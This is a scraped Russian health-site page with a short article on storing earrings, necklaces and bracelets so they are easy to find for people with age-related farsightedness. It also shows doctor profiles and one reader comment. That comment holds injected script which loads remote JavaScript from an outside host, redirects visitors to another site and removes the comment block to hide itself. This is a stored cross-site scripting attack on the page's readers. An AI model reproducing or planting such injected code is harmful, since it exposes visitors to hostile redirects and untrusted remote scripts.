Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Советы для дальнозорких. ...  >>  Советы для дальнозорких. Как хранить бижутерию
 
Обратная связь
 

Советы для дальнозорких. Как хранить бижутерию

Размер шрифта
14 ноября 2011 07:02
  • google_analytics: false
  • Нравится

Возрастная пресбиопия, или дальнозоркость, как бы мы того не хотели, ждет каждого. Как облегчить свою жизнь и украсить квартиру одновременно? Представляем 3 необычных способа хранения украшений для дальнозорких.

Бижутерия

После 40 лет все мы лучше видим вдали, чем вблизи. Развивается возрастная дальнозоркость. Все потому, что наши мышцы, в том числе мышцы, поддерживающие хрусталик, теряют эластичность.

В норме хрусталик, утолщаясь либо уплощаясь с помощью мышц, передает изображение на сетчатку. И если предмет далеко, то хрусталик становится плоским. А если близко, то выпуклым. Но после 40 лет наш хрусталик твердеет, и больше не способен быстро менять свою форму в зависимости от того, насколько далеко или близко находится предмет. Возникает возрастная пресбиопия. Проблем становится все больше, в частности, нам все труднее найти мелкие украшения и любимые сережки в шкатулке.

Где удобнее хранить украшения?


  1. Можно использовать терку как вешалку для сережек. В каждую дырочку терки можно повесить по паре сережек. Так их будет легче найти, и они не потеряются. Терку можно покрасить в яркий цвет и поставить на видное место.

  2. Вешалкам для сувенирных кофейных чашек можно найти новое применение. Чашки – убрать в кухонный шкаф, а на крючки повесить бусы и браслеты. Они не запутаются, как в шкатулке, и буду радовать глаз.

  3. В рамку для фотографий можно вставить картон, обернутый кружевом. А в дырочки от кружев повесить сережки.

 

Сюжеты по теме
Как хранить женскую бижутерию. Советы телезрителей

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.